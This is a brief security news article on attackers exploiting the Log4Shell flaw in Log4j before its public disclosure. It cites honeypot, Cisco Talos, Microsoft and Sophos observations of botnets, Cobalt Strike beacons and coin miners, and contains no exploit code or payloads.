Researchers have discovered threat actors have been exploiting critical Log4Shell flaw in the Log4j library at least one week before the public disclosure.
Researchers have discovered threat actors have been exploiting critical Log4Shell flaw in the Log4j library at least one week before the public disclosure.
NetLab360 researchers have revealed that attackers have attempted to trigger the Log4Shell flaw in the Log4j library of their Anglerfish and Apacket honeypots and have used the vulnerability to create Muhstik and Mirai botnets to target Linux devices.
Cisco Talos team said in a blog post that they observed an attack for the vulnerability known as CVE-2021-44228 from December 2.
“Cisco Talos has observed attacker activity related to CVE-2021-22448 beginning 02-December-2021. It is recommended that organizations expand their hunt for scanning and exploit activity to this date.” reads the blog post published by Cisco Talos.
Microsoft researcher teams also confirmed an attack using Cobalt Strike beacons and coin miners.
“Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.” said in the statement published by Microsoft.
Security researchers Huntress lab have created a tool to test whether the application is vulnerable to the flaw for organizations. Sophos also commented it observed the flaw was already been exploited by crypto miners.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.
You may be interested in reading: How to Survive the COVID Time Cyber Security Threats?